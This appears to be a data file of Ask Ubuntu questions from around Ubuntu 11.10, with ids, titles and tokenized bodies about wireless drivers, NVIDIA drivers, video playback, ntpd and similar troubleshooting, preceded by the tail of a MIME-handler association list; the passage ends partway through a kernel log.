audio/x-wav=gnome-mplayer.desktop ; clementine.desktop ; audacity.desktop ; soundconverter.desktop ; totem.desktop ; banshee.desktop ; vlc.desktop ; audio/x-wavpack=totem.desktop ; banshee.desktop ; audio/x-webm=gnome-mplayer.desktop ; audio/x-xm=gnome-mplayer.desktop ; totem.desktop ; banshee.desktop ; image/*=evince.desktop ; image/avi=banshee.desktop ; image/bmp=phatch.desktop ; gimp.desktop ; phatch-inspector.desktop ; eog.desktop ; shutter.desktop ; image/g3fax=gimp.desktop ; image/gif=phatch.desktop ; gimp.desktop ; phatch-inspector.desktop ; eog.desktop ; shutter.desktop ; firefox.desktop ; firefox-4.0.desktop ; image/jpeg=shotwell-viewer.desktop ; phatch.desktop ; gimp.desktop ; phatch-inspector.desktop ; eog.desktop ; shutter.desktop ; firefox.desktop ; firefox-4.0.desktop ; image/jpg=phatch.desktop ; phatch-inspector.desktop ; eog.desktop ; image/pcx=gimp.desktop ; image/pjpeg=eog.desktop ; image/png=shotwell-viewer.desktop ; phatch.desktop ; gimp.desktop ; phatch-inspector.desktop ; eog.desktop ; shutter.desktop ; firefox.desktop ; firefox-4.0.desktop ; image/svg+xml=gimp.desktop ; inkscape.desktop ; eog.desktop ; opera-browser.desktop ; shutter.desktop ; image/svg+xml-compressed=inkscape.desktop ; eog.desktop ; image/tiff=evince.desktop ; shotwell-viewer.desktop ; phatch.desktop ; gimp.desktop ; phatch-inspector.desktop ; eog.desktop ; shutter.desktop ; image/vnd.djvu=evince.desktop ; djvulibre-djview4.desktop ; image/vnd.rn-realpix=totem.desktop ; vlc.desktop ; image/vnd.wap.wbmp=eog.desktop ; [ ... ] image/x-wmf=gimp.desktop ; image/x-x3f=shotwell-viewer.desktop ; image/x-xbitmap=phatch.desktop ; gimp.desktop ; phatch-inspector.desktop ; eog.desktop ; image/x-xcf=gimp.desktop ; image/x-xpixmap=phatch.desktop ; gimp.desktop ; phatch-inspector.desktop ; eog.desktop ; image/x-xwindowdump=gimp.desktop ; image/x.djvu=djvulibre-djview4.desktop ; image/xpm=shutter.desktop ; inode/directory=nautilus-folder-handler.desktop ; qgit.desktop ; message/rfc822=evolution.desktop ; misc/ultravox=totem.desktop ; banshee.desktop ; vlc.desktop ; text/calendar=evolution.desktop ; text/csv=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-excel.desktop ; libreoffice-calc.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-excel.desktop ; text/directory=evolution.desktop ; text/english=emacs23.desktop ; text/google-video-pointer=totem.desktop ; banshee.desktop ; text/html=opera-browser.desktop ; chromium-browser.desktop ; firefox.desktop ; firefox-4.0.desktop ; thunderbird.desktop ; text/plain=emacs23.desktop ; gedit.desktop ; uex.desktop ; text/rtf=libreoffice-writer.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msword.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msword.desktop ; text/vnd.graphviz=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msword : :open.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msword.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msword.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msword : :open.desktop ; text/vnd.wap.wml=opera-browser.desktop ; text/wml=opera-browser.desktop ; text/x-apport=apport-gtk-mime.desktop ; text/x-apt-sources-list=software-properties-gtk.desktop ; text/x-c=emacs23.desktop ; text/x-c++=emacs23.desktop ; text/x-c++hdr=emacs23.desktop ; text/x-c++src=emacs23.desktop ; text/x-chdr=emacs23.desktop ; text/x-comma-separated-values=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-excel.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-excel.desktop ; text/x-csrc=emacs23.desktop ; text/x-csv=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-excel.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-excel.desktop ; text/x-google-video-pointer=totem.desktop ; banshee.desktop ; text/x-java=emacs23.desktop ; text/x-makefile=emacs23.desktop ; text/x-moc=emacs23.desktop ; text/x-opml+xml=banshee.desktop ; text/x-pascal=emacs23.desktop ; text/x-tcl=emacs23.desktop ; text/x-tex=emacs23.desktop ; texmakerx.desktop ; texmaker.desktop ; text/x-vcard=evolution.desktop ; text/x-winswitchconfig=winswitch.desktop ; text/x-xptv=pitivi.desktop ; text/xml=opera-browser.desktop ; chromium-browser.desktop ; xmlcopyeditor.desktop ; firefox.desktop ; firefox-4.0.desktop ; thunderbird.desktop ; video/3gpp=gnome-mplayer.desktop ; totem.desktop ; banshee.desktop ; video/avi=banshee.desktop ; video/dv=totem.desktop ; banshee.desktop ; vlc.desktop ; video/fli=gnome-mplayer.desktop ; totem.desktop ; banshee.desktop ; video/flv=avidemux-gtk.desktop ; totem.desktop ; banshee.desktop ; video/matroska=gnome-mplayer.desktop ; video/mp2t=gnome-mplayer.desktop ; totem.desktop ; video/mp4=gnome-mplayer.desktop ; totem.desktop ; banshee.desktop ; vlc.desktop ; video/mp4v-es=totem.desktop ; banshee.desktop ; vlc.desktop ; video/mpeg=me-tv.desktop ; gnome-mplayer.desktop ; avidemux-gtk.desktop ; totem.desktop ; banshee.desktop ; vlc.desktop ; [ ... ] x-content/audio=foobnix.desktop ; x-content/audio-cdda=sound-juicer.desktop ; brasero.desktop ; banshee-audiocd.desktop ; vlc.desktop ; x-content/audio-player=clementine.desktop ; banshee-media-player.desktop ; vlc.desktop ; x-content/blank-bd=brasero-nautilus.desktop ; x-content/blank-cd=brasero-nautilus.desktop ; x-content/blank-dvd=brasero-nautilus.desktop ; x-content/blank-hddvd=brasero-nautilus.desktop ; x-content/image-dcf=shotwell.desktop ; x-content/image-picturecd=brasero.desktop ; x-content/software=nautilus-autorun-software.desktop ; x-content/video-dvd=brasero.desktop ; totem.desktop ; vlc.desktop ; x-content/video-svcd=brasero.desktop ; totem.desktop ; vlc.desktop ; x-content/video-vcd=brasero.desktop ; totem.desktop ; vlc.desktop ; x-directory/gnome-default-handler=nautilus-folder-handler.desktop ; x-directory/normal=nautilus-folder-handler.desktop ; x-scheme-handler/apt=ubuntu-software-center.desktop ; apturl.desktop ; x-scheme-handler/chrome=firefox.desktop ; firefox-4.0.desktop ; x-scheme-handler/ftp=nautilus-folder-handler.desktop ; x-scheme-handler/ghelp=yelp.desktop ; x-scheme-handler/help=yelp.desktop ; x-scheme-handler/http=opera-browser.desktop ; chromium-browser.desktop ; firefox.desktop ; firefox-4.0.desktop ; x-scheme-handler/https=opera-browser.desktop ; chromium-browser.desktop ; firefox.desktop ; firefox-4.0.desktop ; x-scheme-handler/info=yelp.desktop ; x-scheme-handler/lastfm=banshee.desktop ; x-scheme-handler/magnet=transmission-gtk.desktop ; x-scheme-handler/mailto=evolution.desktop ; opera-browser.desktop ; thunderbird.desktop ; x-scheme-handler/man=yelp.desktop ; x-scheme-handler/u1ms=banshee.desktop ;
77700	refresh network connections	is there a way to have ubuntu 11.10/samba refresh the network quicker ? i have 3 other computers at home running windows vista & windows 7 and i am able to see all of the computers . however , when one the windows computers enters or leaves the network it takes considerable time for the ubuntu computer to show the windows computer either on or off the network . there must be a way to make the ubuntu computer pick up changes on the network quicker . any help would be appreciated .
77704	system time is 12 hours ahead	i use ntpd to set the time on my server to gmt and it works however it always sets the time 12 hours ahead . it says it is gmt and it does n't give any errors when i run ntpd . any ideas to fix this ? edit : just ran this : $ sudo ntpd -g -q ntpd : time set -50404.385760s $ date thu nov 10 17:43:32 gmt 2011 it seems to have corrected itself but then : $ sudo ntpd sudo : timestamp too far in the future : nov 11 07:43:21 2011 $ date fri nov 11 07:45:13 gmt 2011
77711	force wget to use actual filename	when using wget in a script to download some files from google docs , the name of the file is not preserved . for example : wget 'http : //spreadsheets.google.com/pub ? key=pyj6tsczqmefbzyl0qjbirq & output=xls ' saves the file as pub ? key=pyj6tsczqmefbzyl0qjbirq instead of indicatorhivestimatedprevalence15-49.xls , which is what i get if i click on the link in a browser . is there any way to enforce this `` browser-like '' behaviour in wget ?
77714	how can i save settings on a live usb ?	so i have an ubuntu 11.10 live usb disk . i 've noticed that my settings never get saved . every time i reboot while in my live usb and then boot back into it , all my settings and [ un ] installed programs revert back to default after the reboot . how can i set some sort of persistence on settings on a live usb ?
77715	what is the best programming language to develop ubuntu software ?	i want to start programming ubuntu software but i do n't know which language to use . what would be the best language ? i know some python at the moment .
77716	skype freezes desktop on start	i have the latest version of skype 64b installed in natty x64 with gnome2 . i downloaded the deb file from the official page ( skype-ubuntu_2.2.0.35-1_amd64 ) . i had been working ok since i first installed it a couple of months ago but since last week whenever i click on the icon to open it the whole desktop freezes , actually it starts lagging , like the mouse takes a while to answer every 2 secs , sometimes it stays like that until skype automatically force closes or the desktop freezes completely . i looked around in google but the best answer i got was to re-install . it actually worked , but only once , second time i tried to open it same behavior reappeared . any help someone can give will be most appreciated .
77719	wireless does n't work on a lenovo v570	i 've had ubuntu installed on my hd for about 3 months but ever since i ran into this wireless issue i kinda lost my lust of ubuntu . i have zero experience getting around with/ using the console command . i have a lenovo v570 . i got the driver update for the broadcom networking card via the additional drivers application but that did nothing . i love the look and feel of using ubuntu but i have no technological experience for the matter . any help would be awesome . when i scan for wireless connections while in ubuntu , my computer picks up nothing , while on win7 it will pick up the handful of wireless networks around my area . my wired connection is fine , but the use of not having wireless on a laptop is rather contradictory to it as a feature . cheers ! also , i just installed 11.10 , if that helps any . yes , i used the search before i posted this , but again i have zero understanding of the command stuff and need a meat and potatoes answer ( s ) . stephen @ ubuntu : ~ $ sudo lshw -class network [ sudo ] password for stephen : *-network unclaimed description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f1900000-f1903fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 06 serial : f0 : de : f1:63:98:14 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=192.168.1.78 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : f1804000-f1804fff memory : f1800000-f1803fff stephen @ ubuntu : ~ $ rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : no 1 : acer-wireless : wireless lan soft blocked : yes hard blocked : no
77721	consuming too much power on a dell 15r	i 'm new to ubuntu , and i 've just installed ubuntu 11.10 , and i must say i really like it a lot . i 'm getting used to ubuntu faster than i thought but the only issue i 'm having is the power consumption . i have a `` dell 15r with bios a07 '' and i uninstalled ubuntu 11.04 because of some glitches i hated . none of those appear on this ubuntu but now my computer discharges way too quick . when i check the power icon , it states that i have like 3:45 min remaining , which is fairly the same as what win7 and ubuntu 11.04 used to tell me but 15 min later i check again and it gives me only 1:15 min remaining . also , my computer seems to get a lot hotter than it used to . is there more options to control the power usage on my laptop ?
77723	cursor jumps around while typing , fn+f3 to disable touchpad also not working on an asus eee pc 1015pe	jumping cursor while typing on my asus eee pc 1015pe . keyboard shortcut -- function key plus f3 also not working , as well as a few other function keys not working . would appreciate any help . note : mouse/touchpad `` disable touchpad while typing '' setting is enabled , but does not work .
77724	why gmail chat appears when the screen is locked ?	when i lock the screen , gmail chat appears at the bottom of the screen just like when it 's unlocked . is it a bug ?
77725	accidentally created a file called `` -- help '' . how to remove it ?	i accidentally redirected the output of a command to -- help rather than passing it as a parameter . how do i escape the dashes to i can remove the file ? this is on a headless server , so i 'll need to do it from the command line .
77726	ffmpeg converting to flv but with 0 file size	i 'm having problems regarding conversion of video to flv format . below is my command for conversion , but it seems to convert the video to flv but the file size remains 0 kb , what could be the problem , please suggest . my command : exec ( `` /usr/bin/ffmpeg -i $ inputfile -ar 22050 -b 300000 -ab 128 -f flv -r 25 -s 320x240 - | /usr/bin/flvtool2 -u stdin $ outputfile '' , $ output ) ; i tried to do : exec ( `` which ffmpeg '' ) ; and it showed me /usr/bin/ffmpeg , so what could be the problem . is is that the flvtool2 is not working properly , or the path the flvtool2 is wrong ( if yes then how can i check the path ) help needed
77728	can i change the /home folder after ubuntu installation ?	i had installed ubuntu 11.10 on a clear 40gb hd , but now i have a 100gb partition that i want to use as a /home folder , is there a problem to simple use fstab to change the mounting point ? i 'm thinking to copy/paste all the archives in actual /home folder to this 100gb partition and then change the mounting point in fstab . edit : i will not make this because this 100gb partition is ntfs type , so no donuts for me .
77729	disk wo n't wake up ( ? ) after hibernate	i have a hard disk mounted using fstab like so : /dev/sdd1 /media/data_two ext4 defaults , errors=remount-ro 0 2 occasionally after resuming from hibernate , the /media/data_two folder appears empty and i can not write to the drive . when i use disk utility to refresh smart data , i get this error : error retrieving ata smart data : helper failed with exit code 1 : failed to check if disk /dev/sdd is awake : operation not supported i see this error in dmesg : [ 19659.651976 ] sd 4:0:0:0 : [ sdd ] unhandled error code [ 19659.651977 ] sd 4:0:0:0 : [ sdd ] result : hostbyte=did_bad_target driverbyte=driver_ok [ 19659.651980 ] sd 4:0:0:0 : [ sdd ] cdb : read ( 10 ) : 28 00 00 03 04 00 00 04 00 00 [ 19659.651985 ] end_request : i/o error , dev sdd , sector 197632 if i touch /media/data_two/testfile i get this error : touch : can not touch '/media/data_two/testfile ' : read-only file system and this error in dmesg : [ 19782.065457 ] buffer i/o error on device sdd1 , logical block 0 [ 19782.065459 ] lost page write due to i/o error on sdd1 [ 19782.065478 ] ext4-fs error ( device sdd1 ) : ext4_find_entry:934 : inode # 2 : comm touch : reading directory lblock 0 if i reboot , the drive is accessible again . what could be happening ?
77740	how can turn on vsync in gnome shell ?	that 's my problem , i can not turn on vsync ( or vertical synchronization ) in gnome shell , so that videos are `` choppy '' vertically . i must say that i have a hd integrated graphics intel sandy bridge , in ubuntu with nvidia card is easily activated from the nvidia control panel . as i can do the same in intel ? it also clarifies that i can enable compiz vsync from ccsm , but i find nothing in shell
77741	synchronize bookmarks between firefox and opera among many computers	right now i 'm using xmarks to sync my firefox bookmarks among some computers i use ( namely home and office ) . is there a way to sync these bookmarks between opera and firefox , so that i can use opera at home and firefox at the office , for example ?
77743	canon pixma ip1600 wo n't print	so i 'm new to ubuntu and i 'm trying to install/config my canon pixma ip1600 printer in 11.10 . i 've went through the install that comes up when you connect your printer and selected ip1600 tried both drivers listed i also have done this steps . i 'm trying to switch from windows but if i cant print then i 'm not going to bother doing so . any help is thanked . ps printer light flashes when i say print but nothing happens . how to install canon pixma ip1600 ?
77747	i just got the lenovo thinkpad tablet and it wo n't connect to the internet	my internet is password protected , and so whenever i enter the password it says `` obtaining ip address '' so after doing this for a while it says `` disabled , secured with wep '' or something like that . then when i hit connect it does the `` obtaining ip '' thing again , then goes back to `` disabled , secured with wep '' . can anyone tell me what to do ? i just got it today from school and it wo n't connect to my home internet , it 's wi-fi is turned on and my internet is wi-fi , can anyone help ?
77748	how do i install ubuntu on my ibook g3 ?	how can i download ubuntu on my pc , burn it to a disk , and install it on my ibook g3 ?
77750	video playback not working in ubuntu 11.10	( ubuntu 11.10 , gnome classic with compiz , nvidia graphics card ) this problem occurs with every and all video , whether it 's a youtube video in firefox , an avi file in movie player , or any other video . video simply does not work . when i start any kind of video , the image halts after a second or two . the sound , however , continues . before it seemed that if i delete all the files in ~/.gstreamer-0.10/ , then reboot , the video will play . however this is no longer the case . manipulating files in that directory does nothing to help the situation . i am now no longer sure this is a gstreamer issue or something else . i am open to any and all possibilities . how can i get video playback to run smoothly on my machine ? update : vlc seems to be working now . however , video will not play in any browser , so there is still something amiss . as requested in comments , this is the output from playing from the command line . note it says `` your system is too slow to play this ! '' which is patently untrue . the computer has never had any trouble playing video of any size up until upgrading to 11.10 . i am assuming that this is symptomatic of some other problem . $ mplayer standup_20090523.mp4 mplayer2 unknown ( c ) 2000-2011 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing standup_20090523.mp4 . detected file format : quicktime/mpeg-4/motion jpeg 2000 format ( libavformat ) [ lavf ] stream 0 : video ( h264 ) , -vid 0 [ lavf ] stream 1 : audio ( aac ) , -aid 0 , -alang und video : [ h264 ] 480x320 24bpp 29.970 fps 706.1 kbps ( 86.2 kbyte/s ) clip info : major_brand : isom minor_version : 512 compatible_brands : isomiso2avc1mp41 creation_time : 1970-01-01 00:00:00 encoder : lavf52.64.2 load subtitles in . ========================================================================== opening video decoder : [ ffmpeg ] ffmpeg 's libavcodec codec family asking decoder to use 4 threads if supported . selected video codec : [ ffh264 ] vfm : ffmpeg ( ffmpeg h.264 ) ========================================================================== ========================================================================== opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders audio : 48000 hz , 2 ch , s16le , 123.9 kbit/8.07 % ( ratio : 15492- > 192000 ) selected audio codec : [ ffaac ] afm : ffmpeg ( ffmpeg aac ( mpeg-2/mpeg-4 audio ) ) ========================================================================== [ ao oss ] audio_setup : ca n't open audio device /dev/dsp : no such file or directory ao : [ alsa ] 48000hz 2ch s16le ( 2 bytes per sample ) starting playback ... a : 0.0 v : 0.0 a-v : 0.000 ct : 0.000 0/ 0 ? ? % ? ? % ? ? , ? % 0 0 movie-aspect is 1.33:1 - prescaling to correct movie aspect . vo : [ vdpau ] 480x320 = > 480x360 planar yv12 [ vdpau ] got display refresh rate 60.020 hz . [ vdpau ] if that value looks wrong give the -vo vdpau : fps=x suboption manually . a : 0.2 v : 0.3 a-v : -0.040 ct : -0.000 0/ 0 ? ? % ? ? % ? ? , ? % 0 0 [ ao_alsa ] write error : broken pipe [ ao_alsa ] trying to reset soundcard . a : 7.7 v : 2.0 a-v : 5.775 ct : -0.000 0/ 0 7 % 4 % 61.8 % 50 0 ************************************************ **** your system is too slow to play this ! **** ************************************************ possible reasons , problems , workarounds : - most common : broken/buggy _audio_ driver - try -ao sdl or use the oss emulation of alsa . - experiment with different values for -autosync , 30 is a good start . - slow video output - try a different -vo driver ( -vo help for a list ) or try -framedrop ! - slow cpu - do n't try to play a big dvd/divx on a slow cpu ! try some of the lavdopts , e.g . -vfm ffmpeg -lavdopts lowres=1 : fast : skiploopfilter=all . - broken file - try various combinations of -nobps -ni -forceidx -mc 0 . - slow media ( nfs/smb mounts , dvd , vcd etc ) - try -cache 8192 . - are you using -cache to play a non-interleaved avi file ? - try -nocache . read docs/html/en/video.html for tuning/speedup tips . if none of this helps you , read docs/html/en/bugreports.html . a : 7.9 v : 8.0 a-v : -0.036 ct : 0.000 0/ 0 2 % 2 % 15.2 % 218 0 [ ao_alsa ] write error : broken pipe [ ao_alsa ] trying to reset soundcard . a : 11.1 v : 11.2 a-v : -0.043 ct : 0.000 0/ 0 2 % 2 % 19.3 % 300 0 [ ao_alsa ] write error : broken pipe [ ao_alsa ] trying to reset soundcard . a : 16.7 v : 11.2 a-v : 5.443 ct : 0.000 0/ 0 2 % 2 % 24.7 % 300 0 exiting ... ( quit ) more requested command line output : $ gst-launch-0.10 -- gst-debug='*:2 ' playbin2 uri=file : ///home/dave/vi videos/ visa/ dave @ homebase : ~/videos/stand_up_for_mobile $ gst-launch-0.10 -- gst-debug='*:2 ' playbin2 uri=file : ///home/dave/videos/stand_up_for_mobile/standup_20090523.mp4 setting pipeline to paused ... pipeline is prerolling ... 0:00:00.070988199 19816 0x97287c0 warn qtdemux qtdemux_types.c:191 : qtdemux_type_get : unknown quicktime node type avc1 0:00:00.071037322 19816 0x97287c0 warn qtdemux qtdemux_types.c:191 : qtdemux_type_get : unknown quicktime node type avcc 0:00:00.071062385 19816 0x97287c0 warn qtdemux qtdemux.c:8541 : qtdemux_parse_tree : < qtdemux0 > ca n't handle datetimes before 1970 yet , please file a bug at http : //bugzilla.gnome.org 0:00:00.071373884 19816 0x97287c0 warn qtdemux qtdemux.c:6896 : qtdemux_parse_trak : < qtdemux0 > unknown version 00000000 pipeline is prerolled ... setting pipeline to playing ... 0:00:00.147461464 19816 0x959f050 warn bin gstbin.c:2380 : gst_bin_do_latency_func : < playbin20 > did not really configure latency of 0:00:00.000000000 new clock : gstpulsesinkclock 0:00:27.651053215 19816 0x992aef0 warn pulse pulsesink.c:630 : gst_pulsering_stream_underflow_cb : < audiosink-actual-sink-pulse > got underflow ^ccaught interrupt -- handling interrupt . interrupt : stopping pipeline ... execution ended after 45797315295 ns . setting pipeline to paused ... setting pipeline to ready ... setting pipeline to null ... freeing pipeline ...
77753	ca n't open wd my passport essential usb 2.0 hard drive	i am not able to open my external drive on ubuntu 11 10 . what are the steps needed to get it operational on my desktop ?
77758	how can i edit video tags ?	i 'm trying to edit the tags ( title , artist , year etc ) of a .mkv file with vlc player . i open the video and select tools > media information ( or ctrl+i ) . then i do the changes i want and click in save metadata . the tag seems to be changed only for the current vlc player session , because when i open the mkv proprieties window , i can see it is not updated . is this a vlc player bug ? can anyone help me with this issue ? or show me a way to edit the video tags . i searched for it and only found tag editors for mp3 and other audio formats .
77761	where can my unity mockups go ?	i have made some mock-ups for ubuntu 12.04 and i would like to know where i can put them to be seen by the ubuntu community . here they are :
77765	recovering file from bad synchronization	i am using ubuntu one file synchronization on two computers . both systems were disconnected from the ubuntu one service for some days and changes were made to the same file on both systems . on one system the changes were insignificant , something like the file being touched or something similar . on the other system there were significant changes . both of the systems reconnected to the file synchronization service at about the same time and ubuntu one overwrote the file with all of the changes . there were no conflict files in this case . i would have hoped for and expected a conflict . it seems like there should be something i can do about this , that the service would n't just overwrite files without some way of restoring old versions . revision history is supposed to be a strength of couchdb . can i use this strength to restore my files ?
77773	trouble installing rabbit vcs for nautilus	i am using ubuntu 11.10 and following instructions mentioned here to install rabbit vcs . i added the ppa properly , did a sudo apt-get update and ran sudo apt-get install rabbitvcs-core rabbitvcs-nautilus rabbitvcs-thunar rabbitvcs-gedit rabbitvcs-cli there were dependency issues and i googled a bit and found out that i need to install rabbitvcs only for nautilus as that is the default file manager for ubuntu . so i ran the install commands separately for rabbitvcs-core , rabbitvcs-gedit and rabbitvcs-cli . now my understanding is that those are installed properly . however when i run the install command for rabbitvcs-nautilus , i still get a dependency issue . ranhiru @ ranhiru-hp-hdx16-notebook-pc : ~ $ sudo apt-get install rabbitvcs-nautilus reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : rabbitvcs-nautilus : depends : nautilus ( < 1:3.0~ ) but 1:3.2.1-0ubuntu2 is to be installed depends : python-nautilus ( < 1.0~ ) but 1.0-0ubuntu2 is to be installed e : unable to correct problems , you have held broken packages . how do i solve this ?
77778	how can i force alsa to always `` unmute '' the headphone jack sense ?	i 've got a hp nc8000 ( my secondary laptop now ) , and it 's got some quirks . one of the most annoying is that i have to remember to `` unmute '' the headphone jack sense every time i boot . p.s : audio info : card : intel 82801db-ich4 chip : analog devices ad1981b is there a way to make this be the default setting ?
77779	i tried to reset unity got some strange output . what to do ?	i ran : unity -- reset and got : warning : unity currently default profile , so switching to metacity while resetting the values ( metacity:3086 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( metacity:3086 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( metacity:3086 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( metacity:3086 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins skipping upgrade com.canonical.unity.unity.01.upgrade skipping upgrade com.canonical.unity.unity.02.upgrade initializing core options ... done initializing bailer options ... done initializing detection options ... done initializing composite options ... done xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . compiz ( opengl ) - fatal : glxcreatecontext failed compiz ( bailer ) - info : ensuring a shell for your session abdurahim @ abdu-1 : ~ $ ( metacity:3151 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( metacity:3151 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( metacity:3151 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( metacity:3151 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , before being returned to the prompt .
77783	using thunderbird and outlook with gmail	i 'm not sure if this is the right place for this , but since i thought it might be a thunderbird setting , i posted here . i have set up both thunderbird ( on ubuntu 11.10 ) and outlook ( on windows 7 ) to download my gmail emails . whenever thunderbird downloads a mail ( which has n't been downloaded by outlook ) , outlook wo n't download that mail . the mail has n't been deleted from the server , because i can still see it using the gmail browser app , but it seems like it 's marked as `` downloaded '' and therefore outlook does n't want to grab it . is there a setting to disable this functionality in thunderbird , or is this something i need to enable in outlook ?
77787	how can i get window thumbnails when hovering over unity bar application icons ?	i am pretty sure that after installing 11.10 when an application had two or more windows open and i hovered over a unity bar icon with little white arrows ( one for each window ) , i was getting a window thumbnail for each window of that application . but i do n't see that any more . does anyone know how to restore that ?
77794	using ubuntu one cloud services on a nokia e7	is there a http : \ address for mapping ubuntu one cloud services on my nokia e7 by using remote drives , i have done so for mapping 4shared , and dropbox can be done via a webdav application , is there anyway of doing it for free like 4shared instead of paying a premium for a webdav subscription ? thankyou
77801	help , my nvidia drivers are completely broken	i 'm on ubuntu 10.04 lts and everything was fine up till about two hours ago , since when i 've spent all my time trying to make things work again . i was trying to install the latest drivers from the nvidia website , v285.05.09 ( since i 'm currently using the latest drivers available in ubuntu , nvidia-current v195.36.24 , yet webgl does n't work in either chrome or firefox , and they always suggest that i try the latest driver versions ) . but after installing this and rebooting , x starts with an error , prompting me to run in reduced graphics mode and/or restore my graphics settings . when i checked /var/log/kern.log i saw : nvrm : api mismatch : the client has the version 285.05.09 , but nvrm : this kernel module has the version 195.36.24 . please nvrm : make sure that this kernel module and all nvidia driver nvrm : components have the same version . my questions has two parts : how do i actually make these latest nvidia drivers work ? if i try this out and it does n't work ... how do i roll back what i had before ? here 's what i tried , all to no avail : picking the restore graphics settings option in the initial error prompt from x under administration > hardware drivers , i see that the `` nvidia ( current ) '' option is already chosen/active , so i ca n't do anything here ran sudo dpkg-reconfigure nvidia-current update 1 : some additional info : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.3 lts release : 10.04 codename : lucid $ uname -a linux zs 2.6.32-35-generic # 78-ubuntu smp tue oct 11 16:11:24 utc 2011 x86_64 gnu/linux $ dpkg -l | grep nvidia ii nvidia-173 173.14.22-0ubuntu11 nvidia binary xorg driver , kernel module and vdpau li ii nvidia-173-modaliases 173.14.22-0ubuntu11 modaliases for the nvidia binary x.org driver ii nvidia-96-modaliases 96.43.17-0ubuntu1.1 modaliases for the nvidia binary x.org driver ii nvidia-common 0.2.23 find obsolete nvidia drivers ii nvidia-current 195.36.24-0ubuntu1~10.04.1 nvidia binary xorg driver , kernel module and vdpau li ii nvidia-current-modaliases 195.36.24-0ubuntu1~10.04.1 modaliases for the nvidia binary x.org driver ii nvidia-settings 195.36.08-0ubuntu2 tool of configuring the nvidia graphics driver update 2 : gyaaah ! i tried uninstalling my current drivers , rebooting , and installing the new drivers , but the drivers still are n't working . i still have to run x in reduced graphics mode , though now my resolution is no longer ridiculously low . checking /var/log/kern.log for any lines mentioning `` nouveau '' or `` nv '' : ... nov 10 11:53:23 zs kernel : [ 29.935504 ] nouveau 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 nov 10 11:53:23 zs kernel : [ 29.935512 ] nouveau 0000:01:00.0 : setting latency timer to 64 nov 10 11:53:23 zs kernel : [ 29.939265 ] [ drm ] nouveau 0000:01:00.0 : detected an nv50 generation card ( 0x450300a3 ) nov 10 11:53:23 zs kernel : [ 29.939787 ] [ drm ] nouveau 0000:01:00.0 : attempting to load bios image from pramin nov 10 11:53:23 zs kernel : [ 29.985378 ] input : hda digital pcbeep as /devices/pci0000:00/0000:00:1b.0/input/input7 nov 10 11:53:23 zs kernel : [ 29.998478 ] [ drm ] nouveau 0000:01:00.0 : ... appears to be valid nov 10 11:53:23 zs kernel : [ 29.998483 ] [ drm ] nouveau 0000:01:00.0 : bit bios found nov 10 11:53:23 zs kernel : [ 29.998486 ] [ drm ] nouveau 0000:01:00.0 : bios version 60.80.13.00 nov 10 11:53:23 zs kernel : [ 29.998490 ] [ drm ] nouveau 0000:01:00.0 : tmds table revision 2.0 not currently supported nov 10 11:53:23 zs kernel : [ 29.998493 ] [ drm ] nouveau 0000:01:00.0 : bit table 'd ' not found nov 10 11:53:23 zs kernel : [ 29.998495 ] [ drm ] nouveau 0000:01:00.0 : found display configuration block version 4.0 nov 10 11:53:23 zs kernel : [ 29.998499 ] [ drm ] nouveau 0000:01:00.0 : dcb connector table : vher 0x40 5 6 2 nov 10 11:53:23 zs kernel : [ 29.998502 ] [ drm ] nouveau 